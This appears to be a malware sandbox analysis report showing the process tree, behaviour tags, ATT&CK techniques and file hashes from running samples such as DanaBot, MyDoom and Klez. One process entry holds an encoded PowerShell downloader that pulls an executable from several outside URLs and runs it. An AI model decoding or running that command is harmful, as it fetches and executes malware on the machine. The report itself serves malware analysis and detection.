  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa22b646f8,0x7ffa22b64708,0x7ffa22b64718
  2⤵
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
  2⤵
  PID:2424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
  2⤵
  PID:3884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:1844
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
  2⤵
  PID:1868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5728 /prefetch:8
  2⤵
  PID:4708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6008 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1856 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
  2⤵
  PID:5896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,8179613959099574231,17046501936620151302,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
  2⤵
  PID:5136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4516

C:\Windows\system32\control.exe
"C:\Windows\system32\control.exe" SYSTEM
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5524

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:5552

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5600
- C:\Windows\system32\systempropertiesadvanced.exe
  "C:\Windows\system32\systempropertiesadvanced.exe"
  2⤵
  - Modifies visibility of file extensions in Explorer
  - Modifies visiblity of hidden/system files in Explorer
  PID:5756

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5948

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\RevokeJoin.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:6024

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\CompareEnter.mp4"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5456

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\" -spe -an -ai#7zMap7295:108:7zEvent5426
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5984
- C:\Windows\SysWOW64\regsvr32.exe
  C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\THE-MA~1\BANKIN~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\THE-MA~1\BANKIN~1\DanaBot.exe@5984
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3696
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\THE-MA~1\BANKIN~1\DanaBot.dll,f0
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1280
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 456
  2⤵
  - Program crash
  PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5984 -ip 5984
1⤵
PID:5368

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\" -an -ai#7zMap3501:154:7zEvent31177
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5548

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Banking-Malware\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2720
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:4016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt
1⤵
PID:1720

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Email-Worm\MyDoom.A.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Email-Worm\MyDoom.A.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6076

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Email-Worm\Klez.e.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Email-Worm\Klez.e.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\SysWOW64\Winkqjf.exe
C:\Windows\SysWOW64\Winkqjf.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\WindowsUpdate.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\WindowsUpdate.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:5228

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\Windows-KB2670838.msu.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Joke\Windows-KB2670838.msu.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\284.exe

Filesize
149KB

MD5
dfb2b4e47b6589b121f13d056208f992

SHA1
f6480ba7e7763615e1fa0b3d8289f22df55d82ec

SHA256
9a3dac72ba3b6afc88e307bd9bae52ae2016bf292ead636ec7b34923e27c8ae5

SHA512
c0b41c9d9bf7c42de17d1784de7b996db8597418cbe42417f706fbd09df3e7d057899cea2d0f737ce74447b04dd76ed70b2aa5d02491168595f64bfeb2393e08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\2ec592bd-3b91-43f0-9ea5-2ba4c03a7349.tmp

Filesize
1KB

MD5
aae022cff387da61e42ce16faa7e4776

SHA1
ac0beea4d4333f41b54a957d7ca9a79f6a851693

SHA256
7c91f8e81a3fcc99f8310ee37b2d91d07131979ba9238d3edb0dabe7062db8ad

SHA512
c67a6b141d5a14d19265f28ec9986c3d4c163a449ac3bfc9ed360803fc1b284bd485eb4329b408e41c84d62ae82ee7edfd9a0ad7346be87af514de8782be682b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
df64de84c4108b21ea9920acd4c82739

SHA1
944db40fd507acefadaef2d60d0fa6f2d4700f4c

SHA256
d2abde5166117bdf91f624bc63322c7edc8c1fd5aeb1ed9ebf05ffad2016e451

SHA512
64ac15f9ec2725fd4402ab863cd41f470b003f6dcfa209dd76855ed7a988a98e36b2b64c5515ce5cf26c5f168d182e0b4301d042e7e0ee2d3e1b4c5624942214

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
009500e9661f4383cce769a14168fde3

SHA1
ec935a29c1922c3917b8eedccdf5dd5a1cf5bb8e

SHA256
f42907ec17b7fb997e98feef1eb5ea1c07633887971467c023527ba5a9235c26

SHA512
110ad0d07d24b4baeda838e0d981cb9ebbdd3349c58ae4dae9ce14416bea1b798b02478b32ef6904322942c4bda2ea42a1c1f16e0ab2a58325bf5903b86cd402

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
94716db8a4f3d9b64b6c3234c31ab99e

SHA1
212ef4fb095c5d4f3f7cf7ffb3d4bdbd175b270f

SHA256
31b69e06e12f39d0cf66a18d7ae456a451f7a085d6adc5891f4268771dc2398e

SHA512
1f6cacaa86694623245f1e1b70252b319c7ffac2fb554a038f780242216ff197e0ec38a6f28aad8bf142c25ed9cd05f23516dd9b5b03a811ed6eb40daf4c2d0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
e86b71e390f73e6f9657f823274c62d2

SHA1
55dcb4a5ce3df10c70892c179451527c1a31f180

SHA256
45b6c147eac4945b6c1af8a4a1d65be597bc8376e1b3053f826f96a3300965b8

SHA512
dbe31ceb4c845d5dbd130d4a83d9f34a008bda928a20334f2411e2d1c47e8ada0e39d963121905cbb1b5c212e8d9371a71f0f12e6469f4e525e31743d6034fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b5cd5605c596f3e4e9841c7db490a9ee

SHA1
211c44802b80d4100883c60fc5634417833e16b6

SHA256
7f5fc1a877b6a4766fdf436741a846b84eb8af35c50a312776d25f738e746d71

SHA512
05ff40519261ebafd8232d7f3abf4d66e5540f0612c76a9194078da2ef9a2a846255b5666f9481ff9e2b81121fadac7bfcdd2cfaef027cfb4547c58d2ad68e48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4ecc9d20b484175c12dc7dc032573642

SHA1
6cc9ad24f97daf1a1fe118c34011ec0f73615711

SHA256
107808df2965c3188f2021ef3d665ef019076d3490ff935ef4b3e002a1952be4

SHA512
a1c46f4b274efb6d9af9af04bf21707135b8e824938106bab22a409f5818c13a8aa636afb1555f767457bd47d23dc1ed256adfe79160e9ae772a2e2481f65415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
335e986bc1b97cd5e48467ff614f30b5

SHA1
4cc6003d485c456bbba587beb07cd543ff0e0784

SHA256
2778f1bb91026a9a9feacbb464bb2e48d65c22e0896ac9673b1cd9ba452f9221

SHA512
37faf89cc1cfc12a09bfb1a1ccd19eb6b5b6de36b5c952e52f9696053c0978f5a0ab6e14ae12af0a75c9e72319c00b863d1e0a881a1adec8fc9a60b2bcbd7336

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
a8c050cd73d4417503e12ddaa2403720

SHA1
54206310939a62ce249286686a5be08c8e25cd9b

SHA256
01c776c4cc365bd59c38dbe9b6e82ef9bacdec4a671538348d569a70e1662475

SHA512
42808bc4d49535c59abf89e4fe9cc724415c6b9365a303f0418cacaa4b974ece92929d50ce9f3bb22e544b9dece12c909c8bae1b6723a9e7c3bca1c20398cb9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
175ecd7e93c614da4a6aaa879e59efb7

SHA1
3f11af1c4d1a4bcaaab8fc0df3afa56df6cd2f0b

SHA256
e655af2aceaf60caa576370b1faed9b2767d88ed9e4a091c7ba956ebe2dd73a5

SHA512
d15f98b98147fbcdff4a9be51f21105544c2e692e268b66b48de637ba759c2ac85f69b1620b36a76e1a1b1c51b9d2ba13bacd0081d8c405dd4ccb118470a03f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2df5d345bcfd139afede88c747c9e0d1

SHA1
bd17815d80cfbb6d0b52510285ca374b28fc71ca

SHA256
3e91a38f81b704738778ec5b0b467acdca55884f04f36b61322a32e6b62bcce4

SHA512
1f5492ad8412cfc67d7c23fc3909af6482d9a7e7920478a266195d5cb7ecb76ff4e5d413fc67927a8df90de72a92ba3384ce722ae9d3fa54744760539f74a7c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580fab.TMP

Filesize
874B

MD5
4e32731a7af4652334463464e827fffa

SHA1
001a465f4efb4c384a4d69c00c54ac946fb569af

SHA256
edd6287ba71e513a0ed8afc9af2cfa6e16646c495d7de74cf20503c4532a5a35

SHA512
55ff1af8ed6735f8ecbf91ca2b32e8d7077ba763cda4f16433b749920dfc685c7469a81eb996d75f5b7d47157612a4c2b5480d427d6611d063f2c667cef39688

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
91b1b6cf7d6071e56d42e66bd945bfee

SHA1
ab964329778ca6c61483a80de2e82436721fe70b

SHA256
83efba50c5c94df8432d78d1550865f3b1243d6a14b6ae72fb78c3c884424877

SHA512
b3ffeeae3cb3eb5ad1077281fec6e7780c119908f63af4b73ec5dcaa034de3539e6834b18b8478b9d79133d2a24147e0081735058fe3474ef112c0e9059e9dbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
35abd6625dbdd18f1969f8aa5e63fb83

SHA1
0473651c90d50dd3c8cd6c29ae2dc7b9630ad974

SHA256
2cf3c2e740553afd85721ea302e0eaea1495c34b6cbe2228c067d9928cd43ffe

SHA512
c9fe169f076d50d06d6a5edea96ccff4aee86b557bb837947c9254f537ffead8b31cc3c7d57b33c8866f3e3a953f96c1f69d7ab9530c847f0078516cacc930fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
83a544327c1cc5a903042c6168ab0548

SHA1
17a5f063a37581b21e755377716093f497db2b7a

SHA256
dc9e24c53bfb1640669536aac021e4267f38f4dbcb2c0565f5db1682de944649

SHA512
0785ec83ab58dff767a731302fc3ac2dab2559b5d15c765a6b78effbae5cd8592cea13c127b014df2aa9365eb413098fdfe5373b77836ffbc9c7e82c48b5e91d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
490f3dd9b38d1353d27eb4b0965d2bf7

